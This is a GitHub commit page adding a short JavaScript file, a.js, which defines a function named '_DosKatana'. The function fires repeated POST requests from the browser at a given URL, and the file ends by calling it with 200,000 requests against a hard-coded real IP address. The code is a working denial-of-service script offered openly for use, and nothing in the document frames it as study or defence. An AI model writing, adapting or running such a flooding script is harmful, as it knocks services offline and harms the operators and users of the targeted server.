Skip to content

Commit

Permalink
Create a.js
Browse files Browse the repository at this point in the history
  • Loading branch information
0x1717 committed Aug 19, 2023
1 parent 08012c2 commit 2bd334a
Showing 1 changed file with 14 additions and 0 deletions.
14 changes: 14 additions & 0 deletions a.js
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
function _DosKatana(power, url) {
for (i=1; i<=power; i++) {
x = new XMLHttpRequest;

x.onload = function() {
document.write(this.responseText)
};

x.open('POST', url);
x.send();
}
}

_DosKatana(200000, 'http://88.198.48.45');

0 comments on commit 2bd334a

Please sign in to comment.